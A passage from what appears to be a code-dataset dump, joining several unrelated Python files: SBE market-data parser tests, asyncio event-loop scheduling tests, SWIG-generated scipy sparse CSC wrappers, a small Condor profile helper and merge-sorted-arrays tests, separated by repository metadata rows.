'c30fa90082dd3f8b069bd91478000b0020000100080095ab3d8b069bd914840000200002009bb1203602000002000000805d00003e2d140001000000010030000000000080e8ca113602000002000000805d00003f2d140001000000020130000000000018000000000000019c53980a9600000024131444010000000200000001010000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
msg_count += 1
if msg_count == 1:
assert_equals(32, message.template_id.value)
assert_equals(1502402403112954773, message.transact_time.value)
assert_equals(132, message.match_event_indicator.raw_value)
assert_equals('LastQuoteMsg, EndOfEvent', message.match_event_indicator.value)
n = 0
for repeating_group in message.no_md_entries:
if n == 0:
assert_equals(243150.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322302, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(1, repeating_group.md_price_level.value)
assert_equals(0, repeating_group.md_update_action.raw_value)
assert_equals('New', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
elif n == 1:
assert_equals(243125.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322303, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(2, repeating_group.md_price_level.value)
assert_equals(1, repeating_group.md_update_action.raw_value)
assert_equals('Change', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
n += 1
assert_equals(2, n)
n = 0
for repeating_group in message.no_order_id_entries:
if n == 0:
assert_equals(644422849436, repeating_group.order_id.value)
assert_equals(5437133604, repeating_group.md_order_priority.value)
assert_equals(2, repeating_group.md_display_qty.value)
assert_equals(1, repeating_group.reference_id.value)
assert_equals('Update', repeating_group.order_update_action.value)
assert_equals(1, repeating_group.order_update_action.raw_value)
n += 1
assert_equals(1, n)
def test_incremental_refresh_multiple_messages(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('c90fa9008a15428b069bd91458000b00200001000800e7c43d8b069bd91484000020000180b2654d360200008e0000000a610000f62fac003000000007013000000000001800000000000001e44c980a960000002b13144401000000010000000101000058000b002000010008006f203f8b069bd9148400002000018017336b3602000004000000805d0000402d140002000000020131000000000018000000000000016153980a960000002c131444010000000200000001010000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
if msg_count == 0:
assert_equals('MDIncrementalRefreshBook', message.name)
n = 0
for entry in message.no_md_entries:
if n == 0:
assert_equals(243225.0, entry.md_entry_px.value)
assert_equals(142, entry.md_entry_size.value)
n += 1
assert_equals(1, n)
elif msg_count == 1:
assert_equals('MDIncrementalRefreshBook', message.name)
n = 0
for entry in message.no_md_entries:
if n == 0:
assert_equals(243275.0, entry.md_entry_px.value)
assert_equals(4, entry.md_entry_size.value)
n += 1
assert_equals(1, n)
msg_count += 1
assert_equals(2, msg_count)
def test_incremental_refresh_trade_summary(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('2f0aa9007decc6d2059bd91460000b002a000100080085b89fd2059bd91401000020000100f981d336020000020000000a610000fe2aac00020000000100ffffffff000010000000000000023051980a960000000200000000000000ad50980a960000000200000000000000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
msg_count += 1
assert_equals(42, message.template_id.value)
assert_equals(1502402400015595653, message.transact_time.value)
assert_equals(1, message.match_event_indicator.raw_value)
assert_equals('LastTradeMsg', message.match_event_indicator.value)
# This message has two repeating groups
assert_equals(2, len(message.groups))
# We expect only 1 md entry
for md_entry in message.no_md_entries:
assert_equals(243450.0, md_entry.md_entry_px.value)
assert_equals(2, md_entry.md_entry_size.value)
assert_equals(24842, md_entry.security_id.value)
assert_equals(11283198, md_entry.rpt_seq.value)
assert_equals(2, md_entry.number_of_orders.value)
assert_equals(1, md_entry.aggressor_side.raw_value)
assert_equals('Buy', md_entry.aggressor_side.value)
assert_equals(0, md_entry.md_update_action.raw_value)
assert_equals('New', md_entry.md_update_action.value)
assert_equals('2', md_entry.md_entry_type.value)
# We expect two trades in this message
num_order_id_entries = 0
for order_id_entry in message.no_order_id_entries:
num_order_id_entries += 1
if num_order_id_entries == 1:
assert_equals(644422848816, order_id_entry.order_id.value)
assert_equals(2, order_id_entry.last_qty.value)
else:
assert_equals(644422848685, order_id_entry.order_id.value)
assert_equals(2, order_id_entry.last_qty.value)
assert_equals(1, msg_count)
def test_sbemessage_parse_message(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
try:
from sbedecoder.generated import __messages__ as generated_messages
schema.load(generated_messages)
except:
print('Loading local.')
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_buffer = binascii.a2b_hex('5603a9009c16d545349ad91428001e001e000100080003259845349ad914455300000000000000000000ffffff7fed4380150004')
offset = 12
recorded_message = SBEMessage.parse_message(schema, msg_buffer, offset)
# Validate that we parsed a security status message
assert_equals(30, recorded_message.template_id.value)
assert_equals('SecurityStatus', recorded_message.name)
assert_equals(17389, recorded_message.trade_date.value)
assert_equals(1502401500001346819, recorded_message.transact_time.value)
assert_equals('Reset Statistics', recorded_message.security_trading_event.value)
assert_equals('ResetStatistics', recorded_message.security_trading_event.enumerant)
assert_equals('Pre Open', recorded_message.security_trading_status.value)
assert_equals('PreOpen', recorded_message.security_trading_status.enumerant)
assert_equals('ES', recorded_message.security_group.value)
assert_equals('', recorded_message.asset.value)
assert_equals('Group Schedule', recorded_message.halt_reason.value)
assert_equals('GroupSchedule', recorded_message.halt_reason.enumerant)
assert_equals(None, recorded_message.security_id.value)
if __name__ == "__main__":
    # Run this module's tests under the nose test runner when executed directly.
    nose.runmodule()
| 52.126844 | 417 | 0.680946 | 1,827 | 17,671 | 6.226601 | 0.108922 | 0.14135 | 0.140471 | 0.030063 | 0.808456 | 0.7827 | 0.762131 | 0.749648 | 0.702795 | 0.702795 | 0 | 0.126771 | 0.253183 | 17,671 | 338 | 418 | 52.281065 | 0.735243 | 0.01726 | 0 | 0.728938 | 0 | 0 | 0.110861 | 0.089542 | 0 | 0 | 0 | 0 | 0.490842 | 1 | 0.03663 | false | 0 | 0.043956 | 0 | 0.091575 | 0.003663 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bea5b03a386dd6fe16c39870d1072e93ec77bcf0 | 4,339 | py | Python | testsuite/test_calling.py | ronaldoussoren/objc_asyncio | 89e573fd4c95592515ea8c8a4abfeebdd261fde2 | [
"MIT-0"
] | 2 | 2021-02-20T22:10:54.000Z | 2021-03-26T21:45:06.000Z | testsuite/test_calling.py | ronaldoussoren/objc_asyncio | 89e573fd4c95592515ea8c8a4abfeebdd261fde2 | [
"MIT-0"
] | null | null | null | testsuite/test_calling.py | ronaldoussoren/objc_asyncio | 89e573fd4c95592515ea8c8a4abfeebdd261fde2 | [
"MIT-0"
] | null | null | null | import asyncio
import time
from . import utils
class TestFutureCalling(utils.TestCase):
    """Exercise the event loop's time() and call_soon/call_later/call_at APIs."""

    def test_time(self):
        # Loop time is expected to track the wall clock to ~2 decimal places.
        self.assertAlmostEqual(self.loop.time(), time.time(), 2)

    def test_call_later(self):
        fired_at = None
        received = None

        def recorder(*args):
            nonlocal fired_at, received
            received = args
            fired_at = time.time()

        async def sleep_for(seconds):
            await asyncio.sleep(seconds)

        started = time.time()
        handle = self.loop.call_later(0.5, recorder, 1, 2)
        self.assertIsInstance(handle, asyncio.Handle)
        self.loop.run_until_complete(sleep_for(2))
        # The callback should have fired roughly 0.5s after scheduling.
        self.assertAlmostEqual(fired_at - started, 0.5, 1)
        self.assertEqual(received, (1, 2))

    def test_call_at(self):
        fired_at = None
        received = None

        def recorder(*args):
            nonlocal fired_at, received
            received = args
            fired_at = time.time()

        async def sleep_for(seconds):
            await asyncio.sleep(seconds)

        scheduled_time = time.time() + 0.5
        handle = self.loop.call_at(scheduled_time, recorder, 1, 2)
        self.assertIsInstance(handle, asyncio.Handle)
        self.loop.run_until_complete(sleep_for(2))
        # The callback should have fired close to the absolute deadline.
        self.assertAlmostEqual(fired_at, scheduled_time, 1)
        self.assertEqual(received, (1, 2))

    def test_call_soon(self):
        received = None

        def recorder(*args):
            nonlocal received
            received = args

        async def first_wait():
            await asyncio.sleep(0.5)

        async def second_wait():
            # Scheduling from inside a running coroutine must also work.
            self.loop.call_soon(recorder, 3, 4)
            await asyncio.sleep(0.5)

        handle = self.loop.call_soon(recorder, 1, 2)
        self.assertIsInstance(handle, asyncio.Handle)
        self.loop.run_until_complete(first_wait())
        self.assertEqual(received, (1, 2))
        self.loop.run_until_complete(second_wait())
        self.assertEqual(received, (3, 4))

    def test_call_soon_threadsafe(self):
        received = None

        def recorder(*args):
            nonlocal received
            received = args

        async def first_wait():
            await asyncio.sleep(0.5)

        async def second_wait():
            # Thread-safe variant scheduled from inside the running loop.
            self.loop.call_soon_threadsafe(recorder, 3, 4)
            await asyncio.sleep(0.5)

        handle = self.loop.call_soon(recorder, 1, 2)
        self.assertIsInstance(handle, asyncio.Handle)
        self.loop.run_until_complete(first_wait())
        self.assertEqual(received, (1, 2))
        self.loop.run_until_complete(second_wait())
        self.assertEqual(received, (3, 4))

    def test_calling_with_cancel(self):
        received = None

        def recorder(*args):
            nonlocal received
            received = args

        async def settle():
            await asyncio.sleep(1.0)

        with self.subTest("call_soon"):
            self.loop.call_soon(recorder, 1, 2).cancel()
            self.loop.run_until_complete(settle())
            # A cancelled handle must never invoke its callback.
            self.assertEqual(received, None)
            received = None

        with self.subTest("call_soon_threadsafe"):
            self.loop.call_soon_threadsafe(recorder, 1, 2).cancel()
            self.loop.run_until_complete(settle())
            self.assertEqual(received, None)
            received = None

        with self.subTest("call_later"):
            self.loop.call_later(0.5, recorder, 1, 2).cancel()
            self.loop.run_until_complete(settle())
            self.assertEqual(received, None)
            received = None

        with self.subTest("call_at"):
            self.loop.call_at(time.time() + 0.8, recorder, 1, 2).cancel()
            self.loop.run_until_complete(settle())
            self.assertEqual(received, None)
            received = None

        with self.subTest("call_later with multiple jobs"):
            self.loop.call_later(0.3, recorder, 1, 2)
            self.loop.call_later(0.3, recorder, 3, 4)
            # XXX: This is a crude hack to hit some code for testing...
            self.loop._timer_q[1].cancel()
            self.loop.run_until_complete(settle())
            # One timer was cancelled, but the surviving one must still fire.
            self.assertIsNot(received, None)
            received = None
| 28.359477 | 73 | 0.587693 | 541 | 4,339 | 4.523105 | 0.125693 | 0.101349 | 0.073559 | 0.071925 | 0.854924 | 0.82264 | 0.789947 | 0.767879 | 0.743359 | 0.743359 | 0 | 0.024675 | 0.308827 | 4,339 | 152 | 74 | 28.546053 | 0.791264 | 0.013137 | 0 | 0.719626 | 0 | 0 | 0.017523 | 0 | 0 | 0 | 0 | 0 | 0.168224 | 1 | 0.102804 | false | 0 | 0.028037 | 0 | 0.140187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fe2cd6fbad51c9946145acb950228e5859994781 | 48,087 | py | Python | dist-packages/scipy/sparse/sparsetools/csc.py | Jianwei-Wang/python2.7_lib | 911b8e81512e5ac5f13e669ab46f7693ed897378 | [
"PSF-2.0"
] | null | null | null | dist-packages/scipy/sparse/sparsetools/csc.py | Jianwei-Wang/python2.7_lib | 911b8e81512e5ac5f13e669ab46f7693ed897378 | [
"PSF-2.0"
] | null | null | null | dist-packages/scipy/sparse/sparsetools/csc.py | Jianwei-Wang/python2.7_lib | 911b8e81512e5ac5f13e669ab46f7693ed897378 | [
"PSF-2.0"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.11
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
    # On Python >= 2.6, locate the compiled '_csc' extension next to this
    # wrapper module so the package works without '_csc' on sys.path.
    def swig_import_helper():
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_csc', [dirname(__file__)])
        except ImportError:
            # Fall back to a regular import (e.g. an installed module).
            import _csc
            return _csc
        if fp is not None:
            try:
                _mod = imp.load_module('_csc', fp, pathname, description)
            finally:
                # Always close the file handle returned by imp.find_module.
                fp.close()
            return _mod
    _csc = swig_import_helper()
    del swig_import_helper
else:
    # Older interpreters: plain import only.
    import _csc
del version_info
try:
    # Alias the builtin 'property'; SWIG-generated proxy classes use this name.
    _swig_property = property
except NameError:
    pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    """Dynamic attribute setter: unknown names become instance attributes."""
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
    # New-style classes are available: base SWIG proxies on 'object'.
    _object = object
    _newclass = 1
except AttributeError:
    # Very old Python without 'object': fall back to a classic class.
    class _object : pass
    _newclass = 0
def csc_matmat_pass1(*args):
    """
    csc_matmat_pass1(int const n_row, int const n_col, int const [] Ap, int const [] Ai,
        int const [] Bp, int const [] Bi, int [] Cp)

    SWIG dispatcher for the native first pass of the CSC matrix product;
    the result is written into the non-const output array ``Cp``.
    """
    return _csc.csc_matmat_pass1(*args)
def csc_diagonal(*args):
    """
    csc_diagonal(int n_row, int n_col, int[] Ap, int[] Aj, T[] Ax, T[] Yx)

    SWIG dispatcher for the native ``_csc.csc_diagonal`` routine.  The CSC
    matrix is given by index arrays ``Ap``/``Aj`` and values ``Ax``; the
    result is written into the non-const output array ``Yx``.  Overloaded
    over every supported value type ``T``: npy_bool_wrapper, signed and
    unsigned char/short/int/long long, float, double, long double, and the
    npy complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_diagonal(*args)
def csc_tocsr(*args):
    """
    csc_tocsr(int n_row, int n_col, int[] Ap, int[] Ai, T[] Ax, int[] Bp, int[] Bj, T[] Bx)

    SWIG dispatcher for the native CSC-to-CSR conversion.  The input CSC
    matrix is given by ``Ap``/``Ai``/``Ax``; the converted matrix is
    written into the non-const output arrays ``Bp``/``Bj``/``Bx``.
    Overloaded over every supported value type ``T``: npy_bool_wrapper,
    signed and unsigned char/short/int/long long, float, double, long
    double, and the npy complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_tocsr(*args)
def csc_matmat_pass2(*args):
    """
    csc_matmat_pass2(int n_row, int n_col, int[] Ap, int[] Ai, T[] Ax,
                     int[] Bp, int[] Bi, T[] Bx, int[] Cp, int[] Ci, T[] Cx)

    SWIG dispatcher for the native second pass of the CSC matrix product.
    Operands are given by ``Ap``/``Ai``/``Ax`` and ``Bp``/``Bi``/``Bx``;
    the result is written into the non-const output arrays
    ``Cp``/``Ci``/``Cx``.  Overloaded over every supported value type
    ``T``: npy_bool_wrapper, signed and unsigned char/short/int/long long,
    float, double, long double, and the npy complex wrappers
    (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_matmat_pass2(*args)
def csc_matvec(*args):
    """
    csc_matvec(int n_row, int n_col, int[] Ap, int[] Ai, T[] Ax, T[] Xx, T[] Yx)

    SWIG dispatcher for the native CSC matrix-vector product.  The matrix
    is given by ``Ap``/``Ai``/``Ax`` and the input vector by ``Xx``; the
    result is written into the non-const output array ``Yx``.  Overloaded
    over every supported value type ``T``: npy_bool_wrapper, signed and
    unsigned char/short/int/long long, float, double, long double, and the
    npy complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_matvec(*args)
def csc_matvecs(*args):
    """
    csc_matvecs(int n_row, int n_col, int n_vecs, int[] Ap, int[] Ai, T[] Ax, T[] Xx, T[] Yx)

    SWIG dispatcher for the native CSC matrix times multiple-vector
    product.  The matrix is given by ``Ap``/``Ai``/``Ax``, the ``n_vecs``
    input vectors by ``Xx``; the result is written into the non-const
    output array ``Yx``.  Overloaded over every supported value type
    ``T``: npy_bool_wrapper, signed and unsigned char/short/int/long long,
    float, double, long double, and the npy complex wrappers
    (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_matvecs(*args)
def csc_elmul_csc(*args):
    """
    csc_elmul_csc(int n_row, int n_col, int[] Ap, int[] Ai, T[] Ax,
                  int[] Bp, int[] Bi, T[] Bx, int[] Cp, int[] Ci, T[] Cx)

    SWIG dispatcher for the native elementwise multiplication of two CSC
    matrices.  Operands are given by ``Ap``/``Ai``/``Ax`` and
    ``Bp``/``Bi``/``Bx``; the result is written into the non-const output
    arrays ``Cp``/``Ci``/``Cx``.  Overloaded over every supported value
    type ``T``: npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_elmul_csc(*args)
def csc_eldiv_csc(*args):
    """
    csc_eldiv_csc(int n_row, int n_col, int[] Ap, int[] Ai, T[] Ax,
                  int[] Bp, int[] Bi, T[] Bx, int[] Cp, int[] Ci, T[] Cx)

    SWIG dispatcher for the native elementwise division of two CSC
    matrices.  Operands are given by ``Ap``/``Ai``/``Ax`` and
    ``Bp``/``Bi``/``Bx``; the result is written into the non-const output
    arrays ``Cp``/``Ci``/``Cx``.  Overloaded over every supported value
    type ``T``: npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_eldiv_csc(*args)
def csc_plus_csc(*args):
    """
    csc_plus_csc(int n_row, int n_col, int[] Ap, int[] Ai, T[] Ax,
                 int[] Bp, int[] Bi, T[] Bx, int[] Cp, int[] Ci, T[] Cx)

    SWIG dispatcher for the native elementwise addition of two CSC
    matrices.  Operands are given by ``Ap``/``Ai``/``Ax`` and
    ``Bp``/``Bi``/``Bx``; the result is written into the non-const output
    arrays ``Cp``/``Ci``/``Cx``.  Overloaded over every supported value
    type ``T``: npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_plus_csc(*args)
def csc_minus_csc(*args):
    """Elementwise difference C = A - B of two sparse matrices in CSC form.

    Thin dispatcher onto the SWIG-generated overload set
    ``_csc.csc_minus_csc``; the concrete overload is selected from the
    dtype of the data arrays.  Every overload shares one positional
    layout::

        csc_minus_csc(n_row, n_col, Ap, Ai, Ax, Bp, Bi, Bx, Cp, Ci, Cx)

    n_row, n_col -- matrix dimensions
    Ap, Ai, Ax   -- CSC index/pointer arrays and data of A (read-only)
    Bp, Bi, Bx   -- CSC index/pointer arrays and data of B (read-only)
    Cp, Ci, Cx   -- output arrays that receive the CSC form of C

    Supported value dtypes for Ax/Bx/Cx: npy_bool_wrapper, signed and
    unsigned char/short/int/long long, float, double, long double, and
    the npy complex wrappers (cfloat/cdouble/clongdouble).
    """
    return _csc.csc_minus_csc(*args)
def csc_ne_csc(*args):
    """Elementwise "not equal" comparison C = (A != B) of two CSC matrices.

    Thin dispatcher onto the SWIG-generated overload set
    ``_csc.csc_ne_csc``; the concrete overload is selected from the
    dtype of the input data arrays.  Every overload shares one
    positional layout::

        csc_ne_csc(n_row, n_col, Ap, Ai, Ax, Bp, Bi, Bx, Cp, Ci, Cx)

    n_row, n_col -- matrix dimensions
    Ap, Ai, Ax   -- CSC index/pointer arrays and data of A (read-only)
    Bp, Bi, Bx   -- CSC index/pointer arrays and data of B (read-only)
    Cp, Ci, Cx   -- output arrays that receive the CSC form of C

    Input dtypes for Ax/Bx cover npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers.  The result data Cx is always npy_bool_wrapper,
    regardless of the input dtype.
    """
    return _csc.csc_ne_csc(*args)
def csc_lt_csc(*args):
    """Elementwise "less than" comparison C = (A < B) of two CSC matrices.

    Thin dispatcher onto the SWIG-generated overload set
    ``_csc.csc_lt_csc``; the concrete overload is selected from the
    dtype of the input data arrays.  Every overload shares one
    positional layout::

        csc_lt_csc(n_row, n_col, Ap, Ai, Ax, Bp, Bi, Bx, Cp, Ci, Cx)

    n_row, n_col -- matrix dimensions
    Ap, Ai, Ax   -- CSC index/pointer arrays and data of A (read-only)
    Bp, Bi, Bx   -- CSC index/pointer arrays and data of B (read-only)
    Cp, Ci, Cx   -- output arrays that receive the CSC form of C

    Input dtypes for Ax/Bx cover npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers.  The result data Cx is always npy_bool_wrapper,
    regardless of the input dtype.
    """
    return _csc.csc_lt_csc(*args)
def csc_gt_csc(*args):
    """Elementwise "greater than" comparison C = (A > B) of two CSC matrices.

    Thin dispatcher onto the SWIG-generated overload set
    ``_csc.csc_gt_csc``; the concrete overload is selected from the
    dtype of the input data arrays.  Every overload shares one
    positional layout::

        csc_gt_csc(n_row, n_col, Ap, Ai, Ax, Bp, Bi, Bx, Cp, Ci, Cx)

    n_row, n_col -- matrix dimensions
    Ap, Ai, Ax   -- CSC index/pointer arrays and data of A (read-only)
    Bp, Bi, Bx   -- CSC index/pointer arrays and data of B (read-only)
    Cp, Ci, Cx   -- output arrays that receive the CSC form of C

    Input dtypes for Ax/Bx cover npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers.  The result data Cx is always npy_bool_wrapper,
    regardless of the input dtype.
    """
    return _csc.csc_gt_csc(*args)
def csc_le_csc(*args):
    """Elementwise "less or equal" comparison C = (A <= B) of two CSC matrices.

    Thin dispatcher onto the SWIG-generated overload set
    ``_csc.csc_le_csc``; the concrete overload is selected from the
    dtype of the input data arrays.  Every overload shares one
    positional layout::

        csc_le_csc(n_row, n_col, Ap, Ai, Ax, Bp, Bi, Bx, Cp, Ci, Cx)

    n_row, n_col -- matrix dimensions
    Ap, Ai, Ax   -- CSC index/pointer arrays and data of A (read-only)
    Bp, Bi, Bx   -- CSC index/pointer arrays and data of B (read-only)
    Cp, Ci, Cx   -- output arrays that receive the CSC form of C

    Input dtypes for Ax/Bx cover npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers.  The result data Cx is always npy_bool_wrapper,
    regardless of the input dtype.
    """
    return _csc.csc_le_csc(*args)
def csc_ge_csc(*args):
    """Elementwise "greater or equal" comparison C = (A >= B) of two CSC matrices.

    Thin dispatcher onto the SWIG-generated overload set
    ``_csc.csc_ge_csc``; the concrete overload is selected from the
    dtype of the input data arrays.  Every overload shares one
    positional layout::

        csc_ge_csc(n_row, n_col, Ap, Ai, Ax, Bp, Bi, Bx, Cp, Ci, Cx)

    n_row, n_col -- matrix dimensions
    Ap, Ai, Ax   -- CSC index/pointer arrays and data of A (read-only)
    Bp, Bi, Bx   -- CSC index/pointer arrays and data of B (read-only)
    Cp, Ci, Cx   -- output arrays that receive the CSC form of C

    Input dtypes for Ax/Bx cover npy_bool_wrapper, signed and unsigned
    char/short/int/long long, float, double, long double, and the npy
    complex wrappers.  The result data Cx is always npy_bool_wrapper,
    regardless of the input dtype.
    """
    return _csc.csc_ge_csc(*args)
# This file is compatible with both classic and new-style classes.
| 66.510373 | 126 | 0.613887 | 7,892 | 48,087 | 3.565003 | 0.019387 | 0.344908 | 0.13979 | 0.089995 | 0.942456 | 0.941674 | 0.937587 | 0.931153 | 0.918216 | 0.918216 | 0 | 0.000928 | 0.260465 | 48,087 | 722 | 127 | 66.602493 | 0.790226 | 0.891218 | 0 | 0.117647 | 1 | 0 | 0.03255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0.070588 | 0.105882 | 0.011765 | 0.588235 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 12 |
fe443971e0da440e58f2d9ef1122507c4c796cd1 | 124 | py | Python | src/profiles/vanilla/condor.py | san-bil/pyena | 41bd3e61aa8551f65433c7631e42f214dbf01508 | [
"MIT"
] | null | null | null | src/profiles/vanilla/condor.py | san-bil/pyena | 41bd3e61aa8551f65433c7631e42f214dbf01508 | [
"MIT"
] | null | null | null | src/profiles/vanilla/condor.py | san-bil/pyena | 41bd3e61aa8551f65433c7631e42f214dbf01508 | [
"MIT"
] | null | null | null | import getpass
def get_vanilla_condor_profile():
    """Return the default ("vanilla") Condor profile settings.

    The profile carries a single key, ``presubmit_auth_steps``, whose
    value is a shell snippet (already single-quoted for embedding)
    stating that no pre-submit authentication is required.
    """
    profile = {}
    profile['presubmit_auth_steps'] = "'echo No pre-auth steps required.'"
    return profile
| 20.666667 | 72 | 0.758065 | 17 | 124 | 5.235294 | 0.882353 | 0.202247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 124 | 5 | 73 | 24.8 | 0.824074 | 0 | 0 | 0 | 0 | 0 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0.333333 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 9 |
fe531f59f8b49a1d4ab876a7dee8a731cf5809c8 | 7,454 | py | Python | 139 Merge Sorted Arrays/Merge_Sorted_Arrays_test.py | Iftakharpy/AlgoExpert-Questions | f4aef449bfe0ee651d84a92487c3b3bedb3aa739 | [
"Apache-2.0"
] | 3 | 2021-11-19T07:32:27.000Z | 2022-03-22T13:46:27.000Z | 139 Merge Sorted Arrays/Merge_Sorted_Arrays_test.py | Iftakharpy/AlgoExpert-Questions | f4aef449bfe0ee651d84a92487c3b3bedb3aa739 | [
"Apache-2.0"
] | null | null | null | 139 Merge Sorted Arrays/Merge_Sorted_Arrays_test.py | Iftakharpy/AlgoExpert-Questions | f4aef449bfe0ee651d84a92487c3b3bedb3aa739 | [
"Apache-2.0"
] | 5 | 2022-01-02T11:51:12.000Z | 2022-03-22T13:53:32.000Z | from Merge_Sorted_Arrays import mergeSortedArrays
def test_mergeSortedArrays_case_1():
    # Four sorted lists of mixed lengths; result is one fully sorted merge.
    arrays = [[1, 5, 9, 21], [-1, 0], [-124, 81, 121], [3, 6, 12, 20, 150]]
    expected = [-124, -1, 0, 1, 3, 5, 6, 9, 12, 20, 21, 81, 121, 150]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_2():
    # Inputs contain duplicates across lists (46, 79, 33); all must survive.
    arrays = [
        [-92, -78, -68, 43, 46, 46, 79, 79],
        [-66, -49, -26, -16, 21, 28, 33, 50],
        [-40, -8, 12, 20, 36, 38, 81],
        [-76, -74, -62, -46, -23, 33, 42, 48, 55, 94],
    ]
    expected = [-92, -78, -76, -74, -68, -66, -62, -49, -46, -40, -26, -23,
                -16, -8, 12, 20, 21, 28, 33, 33, 36, 38, 42, 43, 46, 46, 48,
                50, 55, 79, 79, 81, 94]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_3():
    # Seven short lists; exercises the k-way merge with many heads at once.
    arrays = [
        [-95, -74, 1],
        [-28, 28, 95],
        [-89, -78, -67, -66, -25, -22, 2, 38],
        [-86, -35, -25, -13, 41],
        [-85, -77, -21, 72],
        [-55, 4, 84, 98],
        [-75, -73, 22],
    ]
    expected = [-95, -89, -86, -85, -78, -77, -75, -74, -73, -67, -66, -55,
                -35, -28, -25, -25, -22, -21, -13, 1, 2, 4, 22, 28, 38, 41,
                72, 84, 95, 98]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_4():
    # Duplicate values appear in different lists (-43, -15, -8).
    arrays = [
        [-79, -43, -15, 89],
        [-48, 13, 20],
        [-33, -19, -8, 12, 40, 44, 50, 52, 91, 95],
        [-100, -43, -8, 17],
        [-15, 81],
    ]
    expected = [-100, -79, -48, -43, -43, -33, -19, -15, -15, -8, -8, 12, 13,
